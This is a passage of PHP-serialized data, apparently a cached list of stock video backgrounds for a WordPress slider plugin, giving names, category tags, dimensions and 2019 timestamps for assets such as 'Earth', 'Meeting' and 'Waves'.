11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:314;a:13:{s:2:\"id\";s:3:\"524\";s:6:\"handle\";s:9:\"Earth.jpg\";s:5:\"video\";s:9:\"Earth.mp4\";s:4:\"name\";s:6:\"Earth \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:315;a:13:{s:2:\"id\";s:3:\"523\";s:6:\"handle\";s:11:\"Space-2.jpg\";s:5:\"video\";s:11:\"Space-2.mp4\";s:4:\"name\";s:8:\"Space 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1440\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:316;a:13:{s:2:\"id\";s:3:\"522\";s:6:\"handle\";s:13:\"Asteroids.jpg\";s:5:\"video\";s:13:\"Asteroids.mp4\";s:4:\"name\";s:10:\"Asteroids \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:317;a:13:{s:2:\"id\";s:3:\"521\";s:6:\"handle\";s:9:\"Space.jpg\";s:5:\"video\";s:9:\"Space.mp4\";s:4:\"name\";s:6:\"Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:318;a:13:{s:2:\"id\";s:3:\"520\";s:6:\"handle\";s:10:\"People.jpg\";s:5:\"video\";s:10:\"People.mp4\";s:4:\"name\";s:7:\"People \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:319;a:13:{s:2:\"id\";s:3:\"519\";s:6:\"handle\";s:11:\"Walking.jpg\";s:5:\"video\";s:11:\"Walking.mp4\";s:4:\"name\";s:8:\"Walking \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:320;a:13:{s:2:\"id\";s:3:\"518\";s:6:\"handle\";s:19:\"Double-Exposure.jpg\";s:5:\"video\";s:19:\"Double-Exposure.mp4\";s:4:\"name\";s:16:\"Double Exposure \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:321;a:13:{s:2:\"id\";s:3:\"517\";s:6:\"handle\";s:8:\"Girl.jpg\";s:5:\"video\";s:8:\"Girl.mp4\";s:4:\"name\";s:5:\"Girl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1088\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:322;a:13:{s:2:\"id\";s:3:\"516\";s:6:\"handle\";s:17:\"Bengal-Lights.jpg\";s:5:\"video\";s:17:\"Bengal-Lights.mp4\";s:4:\"name\";s:14:\"Bengal Lights \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:323;a:13:{s:2:\"id\";s:3:\"515\";s:6:\"handle\";s:13:\"Swiping-2.jpg\";s:5:\"video\";s:13:\"Swiping-2.mp4\";s:4:\"name\";s:10:\"Swiping 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:324;a:13:{s:2:\"id\";s:3:\"514\";s:6:\"handle\";s:11:\"Mock-Up.jpg\";s:5:\"video\";s:11:\"Mock-Up.mp4\";s:4:\"name\";s:8:\"Mock Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:325;a:13:{s:2:\"id\";s:3:\"513\";s:6:\"handle\";s:13:\"Countdown.jpg\";s:5:\"video\";s:13:\"Countdown.mp4\";s:4:\"name\";s:10:\"Countdown \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:326;a:13:{s:2:\"id\";s:3:\"512\";s:6:\"handle\";s:18:\"Wall-Sketching.jpg\";s:5:\"video\";s:18:\"Wall-Sketching.mp4\";s:4:\"name\";s:15:\"Wall Sketching \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:327;a:13:{s:2:\"id\";s:3:\"511\";s:6:\"handle\";s:26:\"Typing-on-the-keyboard.jpg\";s:5:\"video\";s:26:\"Typing-on-the-keyboard.mp4\";s:4:\"name\";s:23:\"Typing on the keyboard \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:328;a:13:{s:2:\"id\";s:3:\"510\";s:6:\"handle\";s:11:\"Meeting.jpg\";s:5:\"video\";s:11:\"Meeting.mp4\";s:4:\"name\";s:8:\"Meeting \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:329;a:13:{s:2:\"id\";s:3:\"509\";s:6:\"handle\";s:11:\"Swiping.jpg\";s:5:\"video\";s:11:\"Swiping.mp4\";s:4:\"name\";s:8:\"Swiping \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:330;a:13:{s:2:\"id\";s:3:\"508\";s:6:\"handle\";s:9:\"Alarm.jpg\";s:5:\"video\";s:9:\"Alarm.mp4\";s:4:\"name\";s:6:\"Alarm \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1013\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:331;a:13:{s:2:\"id\";s:3:\"507\";s:6:\"handle\";s:13:\"Hey-World.jpg\";s:5:\"video\";s:13:\"Hey-World.mp4\";s:4:\"name\";s:10:\"Hey World \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:332;a:13:{s:2:\"id\";s:3:\"506\";s:6:\"handle\";s:28:\"Typing-on-the-keyboard-2.jpg\";s:5:\"video\";s:28:\"Typing-on-the-keyboard-2.mp4\";s:4:\"name\";s:25:\"Typing on the keyboard 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:333;a:13:{s:2:\"id\";s:3:\"505\";s:6:\"handle\";s:10:\"Valley.jpg\";s:5:\"video\";s:10:\"Valley.mp4\";s:4:\"name\";s:7:\"Valley \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:334;a:13:{s:2:\"id\";s:3:\"504\";s:6:\"handle\";s:9:\"Stars.jpg\";s:5:\"video\";s:9:\"Stars.mp4\";s:4:\"name\";s:6:\"Stars \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:335;a:13:{s:2:\"id\";s:3:\"503\";s:6:\"handle\";s:21:\"Car-in-the-forest.jpg\";s:5:\"video\";s:21:\"Car-in-the-forest.mp4\";s:4:\"name\";s:18:\"Car in the forest \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1012\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:336;a:13:{s:2:\"id\";s:3:\"502\";s:6:\"handle\";s:15:\"Aerial-Shot.jpg\";s:5:\"video\";s:15:\"Aerial-Shot.mp4\";s:4:\"name\";s:12:\"Aerial Shot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:337;a:13:{s:2:\"id\";s:3:\"501\";s:6:\"handle\";s:14:\"Disco-Ball.jpg\";s:5:\"video\";s:14:\"Disco-Ball.mp4\";s:4:\"name\";s:11:\"Disco Ball \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:338;a:13:{s:2:\"id\";s:3:\"500\";s:6:\"handle\";s:22:\"Man-Playing-Guitar.jpg\";s:5:\"video\";s:22:\"Man-Playing-Guitar.mp4\";s:4:\"name\";s:19:\"Man Playing Guitar \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:339;a:13:{s:2:\"id\";s:3:\"499\";s:6:\"handle\";s:14:\"Live-Music.jpg\";s:5:\"video\";s:14:\"Live-Music.mp4\";s:4:\"name\";s:11:\"Live Music \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:340;a:13:{s:2:\"id\";s:3:\"498\";s:6:\"handle\";s:12:\"Cheer-Up.jpg\";s:5:\"video\";s:12:\"Cheer-Up.mp4\";s:4:\"name\";s:9:\"Cheer Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:341;a:13:{s:2:\"id\";s:3:\"497\";s:6:\"handle\";s:14:\"Night-club.jpg\";s:5:\"video\";s:14:\"Night-club.mp4\";s:4:\"name\";s:11:\"Night club \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:342;a:13:{s:2:\"id\";s:3:\"496\";s:6:\"handle\";s:17:\"Cup-Of-Coffee.jpg\";s:5:\"video\";s:17:\"Cup-Of-Coffee.mp4\";s:4:\"name\";s:14:\"Cup Of Coffee \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:343;a:13:{s:2:\"id\";s:3:\"495\";s:6:\"handle\";s:7:\"Pot.jpg\";s:5:\"video\";s:7:\"Pot.mp4\";s:4:\"name\";s:4:\"Pot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:344;a:13:{s:2:\"id\";s:3:\"494\";s:6:\"handle\";s:11:\"Grill-2.jpg\";s:5:\"video\";s:11:\"Grill-2.mp4\";s:4:\"name\";s:8:\"Grill 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:345;a:13:{s:2:\"id\";s:3:\"493\";s:6:\"handle\";s:13:\"Rice-Bowl.jpg\";s:5:\"video\";s:13:\"Rice-Bowl.mp4\";s:4:\"name\";s:10:\"Rice Bowl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1010\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:346;a:13:{s:2:\"id\";s:3:\"492\";s:6:\"handle\";s:9:\"Grill.jpg\";s:5:\"video\";s:9:\"Grill.mp4\";s:4:\"name\";s:6:\"Grill \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:347;a:13:{s:2:\"id\";s:3:\"491\";s:6:\"handle\";s:9:\"Water.jpg\";s:5:\"video\";s:9:\"Water.mp4\";s:4:\"name\";s:6:\"Water \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:348;a:13:{s:2:\"id\";s:3:\"490\";s:6:\"handle\";s:17:\"Feet-and-Sand.jpg\";s:5:\"video\";s:17:\"Feet-and-Sand.mp4\";s:4:\"name\";s:14:\"Feet and Sand \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:349;a:13:{s:2:\"id\";s:3:\"489\";s:6:\"handle\";s:9:\"Ocean.jpg\";s:5:\"video\";s:9:\"Ocean.mp4\";s:4:\"name\";s:6:\"Ocean \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:350;a:13:{s:2:\"id\";s:3:\"488\";s:6:\"handle\";s:9:\"Waves.jpg\";s:5:\"video\";s:9:\"Waves.mp4\";s:4:\"name\";s:6:\"Waves \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:351;a:13:{s:2:\"id\";s:3:\"487\";s:6:\"handle\";s:10:\"Hearts.jpg\";s:5:\"video\";s:10:\"Hearts.mp4\";s:4:\"name\";s:7:\"Hearts \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:352;a:13:{s:2:\"id\";s:3:\"486\";s:6:\"handle\";s:12:\"Octagons.jpg\";s:5:\"video\";s:12:\"Octagons.mp4\";s:4:\"name\";s:9:\"Octagons \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:353;a:13:{s:2:\"id\";s:3:\"485\";s:6:\"handle\";s:11:\"Squares.jpg\";s:5:\"video\";s:11:\"Squares.mp4\";s:4:\"name\";s:8:\"Squares \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:354;a:13:{s:2:\"id\";s:3:\"484\";s:6:\"handle\";s:12:\"Pink-ink.jpg\";s:5:\"video\";s:12:\"Pink-ink.mp4\";s:4:\"name\";s:9:\"Pink ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:355;a:13:{s:2:\"id\";s:3:\"483\";s:6:\"handle\";s:22:\"Blurred-Background.jpg\";s:5:\"video\";s:22:\"Blurred-Background.mp4\";s:4:\"name\";s:19:\"Blurred Background \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 